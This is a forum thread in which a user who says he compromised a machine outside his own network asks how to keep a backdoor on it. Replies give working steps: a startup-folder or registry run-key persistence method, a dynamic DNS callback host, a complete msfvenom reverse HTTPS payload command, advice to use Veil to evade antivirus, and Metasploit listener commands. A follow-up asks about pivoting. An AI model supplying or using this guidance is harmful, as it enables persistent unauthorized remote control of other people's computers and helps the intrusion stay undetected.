Forum Thread: Persistence and Post-exploitation on system outside of LAN network?

Hello, it's been a while. It's been a while since I have posted on here, and I really want to get back and contribute to the community. I have been working on a lot of projects, and I am looking forward to spreading more knowledge and learning more as well.

Well, I guess I've been playing around with my household computers and sort of doing makeshift "labs".

Hypothetically, let's say I was able to compromise a system outside of my LAN network with Metasploit. I port-forwarded my port 4444 and set my listener so that the connection from the victim's external IP address (let's say 123.456.789) reaches my external IP, and because of the port forwarding, the connection goes to my machine where the listener is set up (let's say 192.168.1.187). I hope that didn't sound stupid, BTW. I get a Meterpreter session. I want to maintain access, but since it is outside of my network, what should I do so that I am able to come back to this system? For example, how can I implement a netcat backdoor, or the metsvc service, but for that particular system?

6 Responses

Glad to see you are back, Alan!

Have you tried the persistence script?

Thanks!

Would the persistence script only work on a local area network? Or with some extra configuration would it work on an external network?

There are plenty of ways to gain persistent access.

You can put your binary in your victim's startup folder, or if you can't access the startup folder you can put your binary in the temp folder and put an entry in the registry to run that file every time the system turns on.

For outside the LAN you must have a static IP, or if you don't have a static IP you need to set up a No-IP dynamic DNS name, e.g. xyz.no-ip.info, so if your external IP is 123.456.789.111 then xyz.no-ip.info resolves to that IP.

Once you have created your No-IP dynamic DNS name, move on to Metasploit, and while creating the payload put xyz.no-ip.info in LHOST.

Use this payload:

"msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=xyz.no-ip.info LPORT=4444 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f exe"

This will hopefully create your binary; then upload this binary to your victim's PC (I prefer to upload it into his/her startup folder) and run it once.

This payload will keep trying to connect to your No-IP host address, and this will be your persistence.

Hope it helps.

^^ Do all that, but use Veil, as shikata_ga_nai will most likely get caught by AV.

To reconnect to the persistence, do we have to be listening in Metasploit by doing
use multi/handler
set lport 443
set lhost 192.168.1.11
exploit -j

Does it need to be running in background? Or could we just let it listen without the -j?

Thanks, this is very useful, and I'm wondering how post-exploitation works over the LAN. I mean, how to port scan? I know there is an ARP-scanner script, but how can we discover open ports from other machines, and try pivoting?
